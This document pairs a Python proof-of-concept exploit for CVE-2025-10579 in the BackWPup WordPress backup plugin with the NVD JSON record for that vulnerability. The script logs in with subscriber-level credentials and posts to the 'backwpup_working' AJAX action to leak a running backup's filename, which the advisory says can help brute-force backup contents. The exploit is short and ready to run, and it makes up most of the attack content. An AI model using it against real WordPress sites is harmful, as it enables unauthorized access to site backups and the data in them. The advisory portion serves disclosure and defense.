CVE-2025-10579

import requests import sys # WordPress target URL target_url = "http://target-wordpress-site.com" # Valid WordPress user credentials (subscriber level or higher) username = "test_user" password = "user_password" # Login to WordPress session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } # Send login request session.post(login_url, data=login_data) # Exploit: Access backwpup_working AJAX endpoint without admin privileges ajax_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { "action": "backwpup_working", "id": "1" # Job ID (can be enumerated) } print("[*] Sending exploit request to backwpup_working AJAX endpoint...") response = session.post(ajax_url, data=exploit_data) # Parse response for backup filename if response.status_code == 200: print("[*] Request successful!") print(f"[*] Response content: {response.text}") # Extract backup filename from response # The response typically contains JSON with backup job status and filename else: print(f"[!] Request failed with status code: {response.status_code}")

{"cve": {"id": "CVE-2025-10579", "sourceIdentifier": "[email protected]", "published": "2025-10-25T05:15:36.007", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The BackWPup – WordPress Backup & Restore Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'backwpup_working' AJAX action in all versions up to, and including, 5.5.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve access to a back-up's filename while a backup is running. This information has little value on it's own, but could be used to aid in a brute force attack to retrieve back-up contents in limited environments (i.e. NGINX)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3381187%40backwpup%2Ftrunk&old=3362645%40backwpup%2Ftrunk&sfp_email=&sfph_mail=#file23", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-10579", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1e9a1484-2000-47fa-9890-fa02eddabcd9?source=cve", "source": "[email protected]"}]}}